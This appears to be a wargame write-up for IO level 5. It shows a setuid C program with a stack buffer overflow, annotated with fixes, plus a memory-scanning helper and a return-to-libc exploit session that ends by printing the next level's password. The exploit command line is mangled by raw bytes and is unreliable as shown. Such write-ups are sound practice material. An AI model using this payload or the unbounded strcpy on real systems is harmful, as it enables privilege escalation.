wargame/IO smash the stack
level5
Sanguine
2014. 5. 27. 17:46
Summary: simple RTL (return-to-libc)
level5@io:/levels$ cat level05.c
#include <stdio.h>
#include <string.h>
/*
 * Challenge program for this level: copies the first command-line argument
 * into a fixed 128-byte stack buffer and prints it back.
 * Returns 1 when no argument is supplied, 0 otherwise.
 *
 * NOTE(review): the session further down shows euid=1006(level6) after the
 * program is run as level5, so the binary presumably executes with another
 * account's privileges; a memory-safety bug here is therefore a
 * privilege-escalation bug, not just a crash.
 */
int main(int argc, char **argv) {
/* Fixed-size stack buffer; nothing in this function compares the argument's length with it. */
char buf[128];
if(argc < 2) return 1;
/*
 * Defect (CWE-121, stack-based buffer overflow): strcpy() copies until the
 * source's NUL terminator, so an argument of 128 bytes or more writes past
 * buf into adjacent stack data. Hardened code bounds the copy and checks for
 * truncation, e.g. snprintf(buf, sizeof buf, "%s", argv[1]), and is built
 * with stack protection and run with ASLR as defence in depth.
 */
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}
level5@io:/tmp/sanguine2$ cat whereisshell.c
#include <stdio.h>
/*
 * Helper from the write-up: walks memory upward one byte at a time from a
 * hard-coded address until the 8 bytes at the cursor equal "/bin/sh"
 * (terminating NUL included), then prints the matching address in hex.
 *
 * NOTE(review): a hard-coded address is only useful where mappings land at
 * the same place on every run; on a host with ASLR enabled the value printed
 * here would not carry over to another process. Confirm the target's
 * randomization settings before drawing conclusions from this output.
 */
main()
{
/* Hard-coded starting address; the page does not say what lives there (presumably inside the mapped C library). */
long shell = 0xb7eaaf10;
/* memcmp() returns 0 on a match, which ends the loop. The scan has no upper bound, so without a match it would presumably run until it faults on an unmapped page. */
while(memcmp((void*)shell,"/bin/sh",8))
shell++;
/* NOTE(review): %x expects unsigned int but shell is a long, and memcmp() is called without <string.h>; both happen to work on this 32-bit target. */
printf("%x\n",shell);
}
level5@io:/tmp/sanguine2$ ./whereisshell
b7faaad4
level5@io:/tmp/sanguine2$ /levels/level05 `perl -e 'print "a"x140,"\x10\xaf\xeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¯ê·aaaaÔªú·
sh-4.2$ id
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1006(level6),1005(le
sh-4.2$ cat /home/level6/.pass
9BT8fmYDTPimXXhY3m